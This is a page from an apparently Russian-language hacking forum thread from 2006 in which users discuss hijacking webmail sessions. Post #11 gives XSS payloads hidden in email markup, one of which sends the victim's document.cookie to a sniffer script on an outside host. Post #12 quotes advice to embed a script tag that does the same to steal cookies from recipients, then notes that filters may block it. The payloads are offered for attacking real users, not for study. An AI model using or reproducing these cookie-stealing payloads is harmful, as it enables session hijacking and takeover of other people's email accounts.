ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу Получил сессию с yandex и не знаю что с ней делат. Помогите.
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 01.07.2006, 02:25
m2infect
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396

Репутация: 5
По умолчанию
др. почтовый севис - отличный от яндекса.
Ставлю в письме
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!---->cript:alert('123')"&gt;</B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

пишет - 123

ставлю

<XML ID="xss"><I><B>&lt;IMG SRC="javas<!---->cript:img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
)"&gt;</B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

и ставил просто ссылку, и кодировал в чар код, и редактировал все это, убираяя лишние пробелы. Результат - 0.
Вывод - нужно более экзоичным способом запостить туда скррипт со снифом, либо руки можно мне поломать.

Господа, отвечайте по существу.
С уважением!
Последний раз редактировалось m2infect; 01.07.2006 в 02:31..
 
Ответить с цитированием

  #12  
Старый 01.07.2006, 12:31
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063

Репутация: 429


По умолчанию
Цитата:
Сообщение от VIYu  
Это уже обсуждалось, вобщем в код картинки вставляеш скрипт
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и отправляеш ее месте с письмом, ну и ждеш куков) если пользователь кот отправляеш полный лох и решит посмотреть твою фотку)
Товариш а ты не думал что тама не лохи сидят и тама фильтры стоят?)
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Доpогой IE madnet Болталка 10 26.12.2004 01:41
Небольшой отрывок от книги T-REX Болталка 0 19.10.2004 05:19
Опять ломаем мыло iRedX E-Mail 19 27.09.2004 05:40
Пиянство mifan Болталка 18 03.09.2004 12:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ